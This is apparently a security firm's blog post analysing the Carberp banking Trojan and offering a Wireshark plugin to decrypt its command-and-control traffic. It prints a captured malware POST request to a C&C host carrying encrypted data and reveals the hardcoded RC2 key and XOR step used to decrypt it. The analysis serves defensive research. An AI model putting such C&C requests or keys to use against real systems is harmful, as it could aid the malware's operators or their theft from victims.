Español | English
rss facebook linkedin Twitter

Decrypting Carberp C&C communication

Carberp is a recently (2010) discovered banking Trojan. Although it is not as well known as the currently dominating banking Trojans, such as ZeuS or SpyEye, we can’t simply ignore it due to its powerful capabilities, which may lead it to greater success in the future. The main characteristics of Carberp are:
  • It comes with three plugins: MiniAV, StopAV and Passw. MiniAV is a generic mini-antivirus which was designed to kill specific trojans or other uncategorized possibly malicious applications that had been heuristically considered as malware. It includes a disinfection mechanism against ZeuS, Adrenalin, Limbo, Barracuda and BlackEnergy. That a malicious application would contain a built-in mini antivirus is not something new, we have seen it before with Tatanga as well. The plugin StopAV’s purpose is to take out (kill) various antivirus products, meanwhile the plugin Passw contains password stealing functionality for various applications (ftp, pop3, passwords from Window registry…).
  • It has a very sophisticated installation mechanism which includes remote code injection into the default webbrowser and svchost.exe, and contains a payload which tries to exploit a vulnerability in the operating system (MS08-025). This executes code in the kernel which restores various system hooks used by security applications, thereby concealing the Trojan.
  • Together with backdoor functionality and HTML injection it is able to perform Man-in-the-Browser type attacks against the victims.
Recent variants of Carberp encrypt communication with the C&C, which makes further observation and monitorization of the trojan a more complex task. A Wireshark extension, customized for this purpose, would come in very handy. You can download it from here together with an example .pcap file, source code also included (however it was probed with 32bit version of Wireshark only).


In the above example we can see the plugin in action as the Trojan received an "updateconfig" command from its C&C server. The installation of the plugin is simple; we just have to put it into the "plugins" directory inside Wireshark’s folder. To verify that the plugin is loaded correctly, we have to check that it appears in the list, in the menu Analyze/Enabled Protocols:


There is one more thing to look at that we have not mentioned yet, the algorithm that Carberp uses to encrypt its traffic:

POST /clssvoarsm.phtm HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sandravsxpanel.cz.cc
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 691
cchq=KRQ55AVXERssj8SabRbGQFPODZUhZxjdZY9QgPAaGwhjb1%2FEqCdQneoEfXMET
LcYNneVMlpNcMSCwEFGLhSABClbFY8G5AZak5JOk4l8JY1UiZzgmSQWdJFmFYFw77u29
7TRAoJWs4k7zgCKRrwudgtxbdiP62OJOiKSyJ0OCd75ZmYKP4uLo1h3nPT%2BNLn2Zdr
amAU31TfsdLmbf4F%2F3lo%2FS3d00bdbzGZC4oYSIu8Ci9Qw6WCISy8LBBX1LFBS3Y7
S5A633XS5GVyylgvwDCPC%2Fsp47pBFRWa%2Bblnq4NkUnkkyszrnFxgxFfO76kVfzSz
FZAC8xcDnkrBMyr%2BRvINHn3PMdf4jGWImLFT%2BN8r8mDSAz%2FFkOJaxi7OlsiH30
6btuph1s0MG%2F1fLnxxBhsRcssrPVB4Q6VP%2BAOUaDLg26n5XhMbHskphPkhDTyIPZ
lc9LPsAfMG4dfd9PhOGzBJFH9kaAb2kC4WDtU%2BnZcuYoH2advviTm9wtcz4ZASW5kx
HPgkVw9uP73fnNEs1QHdGB57V9G57bd2qdmoZ%2BOojFrtOilpizUQ9cxBvl7nGj%2Bs
%2FuAPWVV%2FXOb1tyoMmtHmSY0BqoXzksdaK2%2FDU%2BGUfkDgV95MiLXd%2FG6hXe
5zXAEXH54ji

The first and last four bytes of the message (marked in red) are needed for initialize the decryption and they are randomly generated at each POST. The data between are base64 encoded + RC2 algorithm. Apart from the randomly generated "short" keys which are 8 bytes in total, there is a "long" key which consists of 16 bytes and is hardcoded inside the binary and we need to extract it. Fortunately it is not that hard to spot it:


By taking a memory dump of the malware, loading it into a disassembler we can spot the right function by looking for the hash value "618ADDBEh". It’s not clear the purpose of this hash, most probably this value belongs to a default decryption key. By the way, our "long" key is "rsg7?GhdHB16_Rbf" however we still have to apply a byte XOR with value 05 to get the final wvb2zBmaMG43ZWgc key.


Once we have got the key, we have to pass it to the plugin in order to get it work. Menu Edit/Preferences/Protocols and that’s all, ready to sniff an infected machine ;)

Jozsef Gegeny
S21sec e-crime

2 comentarios:

Nick Enukov said...

Good day!
link to the plug-in to Wireshark does not work.
may be asked to update it?
Thank you very much

Ion said...

We have updated it, sorry for the inconveniences.


(+34 902 222 521)


24 hours a day, 7 days a week



© Copyright S21sec 2013 - All rights reserved


login